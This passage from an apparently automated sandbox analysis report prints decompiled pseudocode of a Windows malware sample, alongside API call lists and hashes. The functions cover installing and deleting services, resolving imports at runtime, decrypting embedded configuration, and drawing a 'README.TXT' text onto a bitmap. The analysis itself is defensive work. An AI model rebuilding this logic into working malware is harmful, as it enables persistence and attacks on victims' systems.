					if(_v16 != 0) {
						_t17 = StartServiceW(_v16, 0, 0);
					}
				}
				if(_v16 != 0) {
					_t17 = CloseServiceHandle(_v16);
				}
				if(_v12 == 0) {
					return _t17;
				} else {
					return CloseServiceHandle(_v12);
				}
			}







                                                                                        0x004026ac
                                                                                        0x004026b3
                                                                                        0x004026c3
                                                                                        0x004026c9
                                                                                        0x004026d0
                                                                                        0x004026d2
                                                                                        0x00402702
                                                                                        0x00402708
                                                                                        0x0040270f
                                                                                        0x00402718
                                                                                        0x00402718
                                                                                        0x0040270f
                                                                                        0x00402722
                                                                                        0x00402727
                                                                                        0x00402727
                                                                                        0x00402731
                                                                                        0x0040273f
                                                                                        0x00402733
                                                                                        0x00000000
                                                                                        0x00402736

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 004026C3
                                                                                        • CreateServiceW.ADVAPI32(00000000,00000000,00000000,000F01FF,00000110,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402702
                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00402718
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00402727
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00402736
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$CreateManagerOpenStart
                                                                                        • String ID:
                                                                                        • API String ID: 1113237811-0
                                                                                        • Opcode ID: e3729441f882d05e3307cf1b3c736a3fe2a7a1c69a3440c71997bc884b448f0b
                                                                                        • Instruction ID: 6591c276e50952cfc18946ce3e51467d5e7a77df9009557fa70032c1d7a952fa
                                                                                        • Opcode Fuzzy Hash: e3729441f882d05e3307cf1b3c736a3fe2a7a1c69a3440c71997bc884b448f0b
                                                                                        • Instruction Fuzzy Hash: 2411B730940208BBEB229F94DD4AB9DBB75AB04701F208075B6107A5E1C7B51698DF49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402742, Relevance: 7.5, APIs: 5, Instructions: 32serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00402742(short* _a4) {
				void* _v8;
				void* _v12;
				int _t14;

				_v12 = 0;
				_v8 = 0;
				_t14 = OpenSCManagerW(0, 0, 0xf003f); // executed
				_v8 = _t14;
				if(_v8 != 0) {
					_t14 = OpenServiceW(_v8, _a4, 0xf01ff);
					_v12 = _t14;
					if(_v12 != 0) {
						_t14 = DeleteService(_v12);
					}
				}
				if(_v12 != 0) {
					_t14 = CloseServiceHandle(_v12);
				}
				if(_v8 == 0) {
					return _t14;
				} else {
					return CloseServiceHandle(_v8);
				}
			}






                                                                                        0x00402748
                                                                                        0x0040274f
                                                                                        0x0040275f
                                                                                        0x00402765
                                                                                        0x0040276c
                                                                                        0x00402779
                                                                                        0x0040277f
                                                                                        0x00402786
                                                                                        0x0040278b
                                                                                        0x0040278b
                                                                                        0x00402786
                                                                                        0x00402795
                                                                                        0x0040279a
                                                                                        0x0040279a
                                                                                        0x004027a4
                                                                                        0x004027b2
                                                                                        0x004027a6
                                                                                        0x00000000
                                                                                        0x004027a9

                                                                                        APIs
                                                                                        • OpenSCManagerW.SECHOST(00000000,00000000,000F003F), ref: 0040275F
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F01FF), ref: 00402779
                                                                                        • DeleteService.ADVAPI32(00000000), ref: 0040278B
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0040279A
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 004027A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandleOpen$DeleteManager
                                                                                        • String ID:
                                                                                        • API String ID: 204194956-0
                                                                                        • Opcode ID: f96fc0e545baaa93f84d176c4207b4243c7bdeec589f16eea602642f17e7ef94
                                                                                        • Instruction ID: 81241541473389439f97e5286b4cc305a8b963fcfda574e71078e9e96f46dba0
                                                                                        • Opcode Fuzzy Hash: f96fc0e545baaa93f84d176c4207b4243c7bdeec589f16eea602642f17e7ef94
                                                                                        • Instruction Fuzzy Hash: A201B630900209FBDB219F94DE4D79DBA71EB04311F6040B5E505766E0C7B50A98EA49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401867, Relevance: 3.0, APIs: 2, Instructions: 47libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 87%
                                                                                        			E00401867(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				struct HINSTANCE__* _v8;
				char _v76;
				void* _t15;
				void* _t19;
				void* _t23;
				void* _t37;
				void* _t42;
				void* _t43;
				void* _t44;

				_t42 = __esi;
				_t23 = __ebx;
				_t14 = __eax;
				asm("lodsd");
				if(__eax != 0) {
					_t15 = memcpy( &_v76, __esi, __eax);
					_t44 = _t43 + 0xc;
					_t37 = __edi;
					E0040A000( &_v76, _t15);
					_t14 = LoadLibraryA( &_v76); // executed
					_v8 = _t14;
					if(_v8 != 0) {
						while(1) {
							asm("lodsd");
							if(_t14 == 0) {
								break;
							}
							_t19 = memcpy( &_v76, _t42, _t14);
							_t44 = _t44 + 0xc;
							E0040A000( &_v76, _t19);
							_t14 = GetProcAddress(_v8,  &_v76); // executed
							if(_t14 != 0) {
								asm("stosd");
							}
							_t23 = _t23 - 1;
							if(_t23 != 0) {
								continue;
							}
							goto L7;
						}
						return _t14;
					}
				}
				L7:
				return _t14;
			}












                                                                                        0x00401867
                                                                                        0x00401867
                                                                                        0x00401867
                                                                                        0x0040186d
                                                                                        0x00401870
                                                                                        0x00401879
                                                                                        0x00401879
                                                                                        0x0040187b
                                                                                        0x00401882
                                                                                        0x0040188b
                                                                                        0x00401891
                                                                                        0x00401898
                                                                                        0x0040189a
                                                                                        0x0040189a
                                                                                        0x0040189d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004018a8
                                                                                        0x004018a8
                                                                                        0x004018b1
                                                                                        0x004018bd
                                                                                        0x004018c5
                                                                                        0x004018c7
                                                                                        0x004018c7
                                                                                        0x004018c8
                                                                                        0x004018cb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004018cb
                                                                                        0x00000000
                                                                                        0x0040189a
                                                                                        0x00401898
                                                                                        0x004018d0
                                                                                        0x004018d0

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?,?,00000000), ref: 0040188B
                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 004018BD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2574300362-0
                                                                                        • Opcode ID: f44f76c3ab210d1589bbdff79bd4f9acd6f21cf33dcad1d260547685e3cc5fb9
                                                                                        • Instruction ID: 6865328a640b7593708d267312d9b00495b55e7551512d6d04cdd83f906ec8a8
                                                                                        • Opcode Fuzzy Hash: f44f76c3ab210d1589bbdff79bd4f9acd6f21cf33dcad1d260547685e3cc5fb9
                                                                                        • Instruction Fuzzy Hash: 1601627390021C9ADF15EAE48844AEFB7FDDF84304F088536D811F7190EB349A49D695
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402A44, Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 291memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00402A44(void* __eax) {
				void* _v8;
				void* _v12;
				intOrPtr _t44;
				void* _t45;
				void* _t51;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				long _t76;
				long _t79;
				long _t82;
				long _t85;
				long _t88;
				long _t91;
				long _t94;
				long _t97;
				long _t111;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t131;

				_t44 =  *0x40f5da; // 0x400000
				_t1 = _t44 + 0x3c; // 0x80
				_t111 =  *( *_t1 + _t44 + 0x8c);
				_t45 = RtlAllocateHeap( *0x40f5d6, 8, _t111);
				_v8 = _t45;
				if(_v8 == 0) {
					return _t45;
				}
				memcpy(_v8, 0x410030, _t111 - 0x20);
				_t128 = _t127 + 0xc;
				E0040A000(_v8, _t111 - 0x20);
				_t51 = RtlAllocateHeap( *0x40f5d6, 8, _t111 * 4); // executed
				_v12 = _t51;
				if(_v12 != 0) {
					if(E0040A135(_v8, _v12) != 0xffffffff) {
						_t63 =  *((intOrPtr*)(_t126 + 0xc));
						if(_t63 != 0) {
							_t120 = _t63 + _t126;
							_t97 = strlen(_t63 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5b2 = RtlAllocateHeap( *0x40f5d6, 8, _t97);
							if( *0x40f5b2 != 0) {
								E0040120C(_t120,  *0x40f5b2);
							}
						}
						_t64 =  *((intOrPtr*)(_t126 + 0x10));
						if(_t64 != 0) {
							_t119 = _t64 + _t126;
							_t94 = strlen(_t64 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5b6 = RtlAllocateHeap( *0x40f5d6, 8, _t94);
							if( *0x40f5b6 != 0) {
								E0040120C(_t119,  *0x40f5b6);
							}
						}
						_t65 =  *((intOrPtr*)(_t126 + 0x14));
						if(_t65 != 0) {
							_t118 = _t65 + _t126;
							_t91 = strlen(_t65 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5ba = RtlAllocateHeap( *0x40f5d6, 8, _t91);
							if( *0x40f5ba != 0) {
								E0040120C(_t118,  *0x40f5ba);
							}
						}
						_t66 =  *((intOrPtr*)(_t126 + 0x18));
						if(_t66 != 0) {
							_t117 = _t66 + _t126;
							_t88 = strlen(_t66 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5be = RtlAllocateHeap( *0x40f5d6, 8, _t88);
							if( *0x40f5be != 0) {
								E0040120C(_t117,  *0x40f5be);
							}
						}
						_t67 =  *((intOrPtr*)(_t126 + 0x1c));
						if(_t67 != 0) {
							_t116 = _t67 + _t126;
							_t85 = strlen(_t67 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5c2 = RtlAllocateHeap( *0x40f5d6, 8, _t85);
							if( *0x40f5c2 != 0) {
								E0040120C(_t116,  *0x40f5c2);
							}
						}
						_t68 =  *((intOrPtr*)(_t126 + 0x20));
						if(_t68 != 0) {
							_t115 = _t68 + _t126;
							_t82 = strlen(_t68 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5c6 = RtlAllocateHeap( *0x40f5d6, 8, _t82);
							if( *0x40f5c6 != 0) {
								E0040120C(_t115,  *0x40f5c6);
							}
						}
						_t69 =  *((intOrPtr*)(_t126 + 0x24));
						if(_t69 != 0) {
							_t114 = _t69 + _t126;
							_t79 = strlen(_t69 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5ca = RtlAllocateHeap( *0x40f5d6, 8, _t79);
							if( *0x40f5ca != 0) {
								E0040120C(_t114,  *0x40f5ca);
							}
						}
						_t70 =  *((intOrPtr*)(_t126 + 0x28));
						if(_t70 != 0) {
							_t113 = _t70 + _t126;
							_t76 = strlen(_t70 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5ce = RtlAllocateHeap( *0x40f5d6, 8, _t76);
							if( *0x40f5ce != 0) {
								E0040120C(_t113,  *0x40f5ce);
							}
						}
						_t71 =  *((intOrPtr*)(_t126 + 0x2c));
						if(_t71 != 0) {
							_t112 = _t71 + _t126;
							 *0x40f5d2 = RtlAllocateHeap( *0x40f5d6, 8, strlen(_t71 + _t126));
							if( *0x40f5d2 != 0) {
								 *0x40f5f2 = E0040120C(_t112,  *0x40f5d2);
								 *0x40f5f6 = 0;
								 *0x40f5ee = E00401000( *0x40f5d2, _t74, 0xffffffff);
							}
						}
					}
					RtlFreeHeap( *0x40f5d6, 0, _v12);
				}
				return RtlFreeHeap( *0x40f5d6, 0, _v8);
			}






























                                                                                        0x00402a50
                                                                                        0x00402a55
                                                                                        0x00402a5a
                                                                                        0x00402a69
                                                                                        0x00402a6f
                                                                                        0x00402a76
                                                                                        0x00402e43
                                                                                        0x00402e43
                                                                                        0x00402a88
                                                                                        0x00402a8e
                                                                                        0x00402a98
                                                                                        0x00402aad
                                                                                        0x00402ab3
                                                                                        0x00402aba
                                                                                        0x00402ace
                                                                                        0x00402bd1
                                                                                        0x00402bd6
                                                                                        0x00402bd8
                                                                                        0x00402bdc
                                                                                        0x00402be2
                                                                                        0x00402bf4
                                                                                        0x00402c00
                                                                                        0x00402c09
                                                                                        0x00402c09
                                                                                        0x00402c00
                                                                                        0x00402c0e
                                                                                        0x00402c13
                                                                                        0x00402c15
                                                                                        0x00402c19
                                                                                        0x00402c1f
                                                                                        0x00402c31
                                                                                        0x00402c3d
                                                                                        0x00402c46
                                                                                        0x00402c46
                                                                                        0x00402c3d
                                                                                        0x00402c4b
                                                                                        0x00402c50
                                                                                        0x00402c52
                                                                                        0x00402c56
                                                                                        0x00402c5c
                                                                                        0x00402c6e
                                                                                        0x00402c7a
                                                                                        0x00402c83
                                                                                        0x00402c83
                                                                                        0x00402c7a
                                                                                        0x00402c88
                                                                                        0x00402c8d
                                                                                        0x00402c8f
                                                                                        0x00402c93
                                                                                        0x00402c99
                                                                                        0x00402cab
                                                                                        0x00402cb7
                                                                                        0x00402cc0
                                                                                        0x00402cc0
                                                                                        0x00402cb7
                                                                                        0x00402cc5
                                                                                        0x00402cca
                                                                                        0x00402ccc
                                                                                        0x00402cd0
                                                                                        0x00402cd6
                                                                                        0x00402ce8
                                                                                        0x00402cf4
                                                                                        0x00402cfd
                                                                                        0x00402cfd
                                                                                        0x00402cf4
                                                                                        0x00402d02
                                                                                        0x00402d07
                                                                                        0x00402d09
                                                                                        0x00402d0d
                                                                                        0x00402d13
                                                                                        0x00402d25
                                                                                        0x00402d31
                                                                                        0x00402d3a
                                                                                        0x00402d3a
                                                                                        0x00402d31
                                                                                        0x00402d3f
                                                                                        0x00402d44
                                                                                        0x00402d46
                                                                                        0x00402d4a
                                                                                        0x00402d50
                                                                                        0x00402d62
                                                                                        0x00402d6e
                                                                                        0x00402d77
                                                                                        0x00402d77
                                                                                        0x00402d6e
                                                                                        0x00402d7c
                                                                                        0x00402d81
                                                                                        0x00402d83
                                                                                        0x00402d87
                                                                                        0x00402d8d
                                                                                        0x00402d9f
                                                                                        0x00402dab
                                                                                        0x00402db4
                                                                                        0x00402db4
                                                                                        0x00402dab
                                                                                        0x00402db9
                                                                                        0x00402dbe
                                                                                        0x00402dc0
                                                                                        0x00402ddc
                                                                                        0x00402de8
                                                                                        0x00402df6
                                                                                        0x00402dfb
                                                                                        0x00402e13
                                                                                        0x00402e13
                                                                                        0x00402de8
                                                                                        0x00402dbe
                                                                                        0x00402e23
                                                                                        0x00402e23
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?), ref: 00402A69
                                                                                        • memcpy.NTDLL(00000000,00410030,?,?,?,?,?,?,00000000), ref: 00402A88
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00402AAD
                                                                                        • memcpy.NTDLL(0040F470,00000000,00000100,00000000,00000000,?,?,00000000), ref: 00402AE2
                                                                                        • memcpy.NTDLL(0601ac206b9e361,00000000,00000020), ref: 00402AFB
                                                                                        • memcpy.NTDLL(0040F590,?,00000016), ref: 00402B0F
                                                                                        • strlen.NTDLL ref: 00402B25
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402B37
                                                                                        • strlen.NTDLL ref: 00402B62
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402B74
                                                                                        • strlen.NTDLL ref: 00402B9F
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402BB1
                                                                                        • strlen.NTDLL ref: 00402BDC
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402BEE
                                                                                        • strlen.NTDLL ref: 00402C19
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402C2B
                                                                                        • strlen.NTDLL ref: 00402C56
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402C68
                                                                                        • strlen.NTDLL ref: 00402C93
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402CA5
                                                                                        • strlen.NTDLL ref: 00402CD0
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402CE2
                                                                                        • strlen.NTDLL ref: 00402D0D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402D1F
                                                                                        • strlen.NTDLL ref: 00402D4A
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402D5C
                                                                                        • strlen.NTDLL ref: 00402D87
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402D99
                                                                                        • strlen.NTDLL ref: 00402DC4
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402DD6
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00402E23
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402E34
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Allocate$strlen$memcpy$Free
                                                                                        • String ID: 0601ac206b9e361
                                                                                        • API String ID: 1087655705-1052532395
                                                                                        • Opcode ID: 2a71c198e7e4f346b8b2df26f47f8ffc5aaa2b2be3aaa555b2667f05d0419615
                                                                                        • Instruction ID: 6dd33a262d8d6808e7544aefd3a1654a332af83014f008ca0f40a54b6a02e8da
                                                                                        • Opcode Fuzzy Hash: 2a71c198e7e4f346b8b2df26f47f8ffc5aaa2b2be3aaa555b2667f05d0419615
                                                                                        • Instruction Fuzzy Hash: DDB11971141204BFE721AF74EE89F563768BB04305F040576E502B2AB2EB79A96DCB5C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401E1B, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 51%
                                                                                        			E00401E1B(intOrPtr _a4) {
				char _v16;
				char _v90;
				void* _t16;
				void* _t18;
				signed char _t22;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				void* _t30;

				_t29 =  &_v90;
				_t16 = E00401D45( &_v90); // executed
				if(_t16 != 0) {
					_t18 = E00401060(_t29, _t16 - 2, 0);
					_t24 = 0;
					while(1) {
						asm("lodsw");
						if(_t18 == 0) {
							break;
						}
						asm("stosb");
						_t24 = _t24 + 1;
					}
					asm("stosb");
					_t30 = E00401060( &_v90, _t24, 1);
					_t26 = 0;
					do {
						 *(_t30 + _t26) =  *(_t30 + _t26) ^  *(_t30 + _t26 + 8);
						_t26 = _t26 + 1;
					} while (_t26 != 8);
					_t27 = 0;
					do {
						_t22 =  *((intOrPtr*)(_t30 + _t27 + 4));
						 *(_t30 + _t27) =  *(_t30 + _t27) ^ _t22;
						_t27 = _t27 + 1;
					} while (_t27 != 4);
					asm("lodsd");
					_t25 =  &_v16;
					 *_t25 = 0x25002e;
					 *((intOrPtr*)(_t25 + 4)) = 0x38002e;
					 *((intOrPtr*)(_t25 + 8)) = 0x78;
					return  *0x40f69c(_a4, _t25, _t22);
				}
				return _t16;
			}













                                                                                        0x00401e26
                                                                                        0x00401e2c
                                                                                        0x00401e33
                                                                                        0x00401e3c
                                                                                        0x00401e41
                                                                                        0x00401e43
                                                                                        0x00401e43
                                                                                        0x00401e48
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00401e4d
                                                                                        0x00401e4e
                                                                                        0x00401e4e
                                                                                        0x00401e4a
                                                                                        0x00401e5d
                                                                                        0x00401e5f
                                                                                        0x00401e61
                                                                                        0x00401e65
                                                                                        0x00401e68
                                                                                        0x00401e69
                                                                                        0x00401e6e
                                                                                        0x00401e70
                                                                                        0x00401e70
                                                                                        0x00401e74
                                                                                        0x00401e77
                                                                                        0x00401e78
                                                                                        0x00401e7d
                                                                                        0x00401e7e
                                                                                        0x00401e81
                                                                                        0x00401e87
                                                                                        0x00401e8e
                                                                                        0x00000000
                                                                                        0x00401ea0
                                                                                        0x00401eab

                                                                                        APIs
                                                                                          • Part of subcall function 00401D45: RegCreateKeyExW.KERNELBASE(80000002,00000000,00000000,00000000,00000000,00020119,00000000,?,?,0040CE73,?,?), ref: 00401D89
                                                                                          • Part of subcall function 00401D45: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,?,00000080,0040CEB7), ref: 00401DC6
                                                                                          • Part of subcall function 00401D45: memcpy.NTDLL(00000001,?,00000080), ref: 00401DDD
                                                                                          • Part of subcall function 00401D45: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401DEF
                                                                                          • Part of subcall function 00401D45: NtClose.NTDLL(?), ref: 00401DF8
                                                                                          • Part of subcall function 00401D45: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401E07
                                                                                        • _swprintf.NTDLL ref: 00401E9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$CloseCreateQueryValue_swprintfmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1894435707-0
                                                                                        • Opcode ID: 8c1904ace30f707bd0fe08a0591b3e3e595044fed4b464771ae484e0445296ef
                                                                                        • Instruction ID: 64453af2d1555abea667a0ec36192deb977e15eacdcbbf3aa353750e63bc0de6
                                                                                        • Opcode Fuzzy Hash: 8c1904ace30f707bd0fe08a0591b3e3e595044fed4b464771ae484e0445296ef
                                                                                        • Instruction Fuzzy Hash: 6111AF754042042ED7228B64DC81ABFBBDCDF05750F0041BFFD46BA1A6DA35990AC2B8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040A30F, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			_entry_() {
				void* _t6;

				E0040A047(0x410010, 0x410020, 0x10);
				E0040A288();
				E0040A2B5();
				E0040A2DE(); // executed
				E0040911D(_t6); // executed
				ExitProcess(0);
			}




                                                                                        0x0040a31b
                                                                                        0x0040a320
                                                                                        0x0040a325
                                                                                        0x0040a32a
                                                                                        0x0040a32f
                                                                                        0x0040a336

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: 2d53bed1dda3daf35fafb28ebe3648b3b9da0bcde364d634d2851ad2a3ed169f
                                                                                        • Instruction ID: 307ea9a0ff79c5690ad25331125684f8784bd9f5ad9da6b53b9bddff386912e8
                                                                                        • Opcode Fuzzy Hash: 2d53bed1dda3daf35fafb28ebe3648b3b9da0bcde364d634d2851ad2a3ed169f
                                                                                        • Instruction Fuzzy Hash: 4FC0483039031826E0907BF2280BB8C2A04AF4AB4DF5004BFB651382C34EFE10A0653F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 004033B9, Relevance: 72.2, APIs: 38, Strings: 3, Instructions: 439memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 61%
                                                                                        			E004033B9(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				wchar_t* _v32;
				short* _v36;
				short* _v40;
				unsigned int _v44;
				signed int _v48;
				struct HFONT__* _v52;
				void* _v56;
				struct tagSIZE _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				struct tagRECT _v92;
				long _v116;
				long _v120;
				signed short _v122;
				short _v124;
				signed int _v128;
				signed int _v132;
				void _v136;
				intOrPtr _v142;
				short _v144;
				short _v146;
				intOrPtr _v150;
				void _v152;
				char _v164;
				short _v684;
				signed int _t217;
				intOrPtr* _t232;
				int _t259;
				WCHAR* _t261;
				int _t262;
				wchar_t* _t263;
				signed int _t268;
				wchar_t* _t280;

				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v56 = 0;
				_v68 = 0;
				_v72 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 =  *0x40f82c(0);
				if(_v20 != 0) {
					_v24 =  *0x40f864(_v20);
					if(_v24 != 0) {
						_v28 =  *0x40f864(_v20);
						if(_v28 != 0) {
							_v48 =  *0x40f854(_v20, 8) + 0x00000001 & 0xfffffffe;
							_v44 =  *0x40f854(_v20, 0xa) + 0x00000001 & 0xfffffffe;
							_t261 =  &_v164;
							 *_t261 = 0x720041;
							_t261[2] = 0x610069;
							_t261[4] = 0x6c;
							_v52 = CreateFontW(_v44 /  *0x40f854(_v20, 0x58) * 7, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 7, 0, 2, 0, _t261);
							if(_v52 != 0) {
								if(SelectObject(_v24, _v52) != 0) {
									_v56 = RtlAllocateHeap( *0x40f5d6, 8, 0x800);
									if(_v56 != 0) {
										if( *0x40f610 == 0) {
											 *0x40f610 = 0x450052;
											 *0x40f614 = 0x440041;
											 *0x40f618 = 0x45004d;
											 *0x40f61c = 0x54002e;
											 *0x40f620 = 0x540058;
										}
										_t262 =  *0x40f69c(_v56, _a4, 0x40f610);
										if(GetTextExtentPoint32W(_v24, _v56, _t262,  &_v64) != 0) {
											_v68 =  *0x40f860(_v24, _v48, _v44);
											if(_v68 != 0) {
												if(SelectObject(_v24, _v68) != 0) {
													asm("rol eax, 0x8");
													SetTextColor(_v24, 0);
													SetBkMode(_v24, 2);
													asm("rol eax, 0x8");
													SetBkColor(_v24, 0);
													_v92.left = 0;
													_v92.top = (_v44 >> 1) - (_v64.cy << 1);
													_v92.right = _v48;
													_v92.bottom = _v44;
													if(DrawTextW(_v24, _v56, _t262,  &_v92, 0x211) != 0) {
														memset( &_v136, 0, 0x2c);
														_v136 = 0x28;
														_v122 = 0x10;
														_v120 = 0;
														_t217 = _v48;
														_v132 = _t217;
														_t268 = _v44;
														_v128 = _t268;
														_v124 = 1;
